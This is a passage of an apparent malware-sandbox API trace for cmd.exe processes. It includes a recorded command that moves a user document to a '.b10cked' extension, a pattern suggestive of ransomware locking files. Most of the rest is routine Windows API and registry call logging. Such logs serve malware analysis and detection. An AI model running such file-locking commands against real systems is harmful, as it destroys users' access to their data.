nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.372] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.372] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.374] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.374] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x32, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x32, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.375] _close (_FileHandle=4) returned 0 [0235.376] FindNextFileW (in: hFindFile=0x430eb8, lpFindFileData=0x2cf174 | out: lpFindFileData=0x2cf174) returned 0 [0235.376] GetLastError () returned 0x12 [0235.376] FindClose (in: hFindFile=0x430eb8 | out: hFindFile=0x430eb8) returned 1 [0235.376] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.377] _close (_FileHandle=3) returned 0 [0235.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.377] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.377] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.377] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.377] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.377] SetConsoleInputExeNameW () returned 0x1 [0235.377] GetConsoleOutputCP () returned 0x1b5 [0235.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.377] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.378] exit (_Code=0) Process: id = "629" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35018 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35019 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35020 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35021 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35022 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35023 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35024 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35025 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35026 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35027 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35258 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35259 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35260 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35261 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 35262 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 35263 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35264 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35265 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35266 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35267 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35268 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35269 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35270 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35271 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35272 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 35273 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35274 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35275 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35276 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35277 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 35278 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35279 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 35280 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35281 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 871 os_tid = 0x2ac [0234.769] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f914 | out: lpSystemTimeAsFileTime=0x16f914*(dwLowDateTime=0xbf64ada0, dwHighDateTime=0x1d440a9)) [0234.769] GetCurrentProcessId () returned 0x9b0 [0234.769] GetCurrentThreadId () returned 0x2ac [0234.769] GetTickCount () returned 0x4078e [0234.769] QueryPerformanceCounter (in: lpPerformanceCount=0x16f90c | out: lpPerformanceCount=0x16f90c*=29155822242) returned 1 [0234.770] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.770] __set_app_type (_Type=0x1) [0234.770] __p__fmode () returned 0x76b331f4 [0234.770] __p__commode () returned 0x76b331fc [0234.770] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.770] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.770] GetCurrentThreadId () returned 0x2ac [0234.770] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2ac) returned 0x38 [0234.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.770] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.770] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8a4 | out: phkResult=0x16f8a4*=0x0) returned 0x2 [0234.770] VirtualQuery (in: lpAddress=0x16f8db, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.771] GetConsoleOutputCP () returned 0x1b5 [0234.771] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.771] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.771] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.771] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.771] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.771] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.772] GetEnvironmentStringsW () returned 0x2701a8* [0234.772] FreeEnvironmentStringsW (penv=0x2701a8) returned 1 [0234.772] GetEnvironmentStringsW () returned 0x2701a8* [0234.772] FreeEnvironmentStringsW (penv=0x2701a8) returned 1 [0234.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e814 | out: phkResult=0x16e814*=0x40) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0xd0, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x0, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegCloseKey (hKey=0x40) returned 0x0 [0234.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e814 | out: phkResult=0x16e814*=0x40) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x0, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x4) returned 0x0 [0234.773] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x4) returned 0x0 [0234.773] RegQueryValueExW (in: 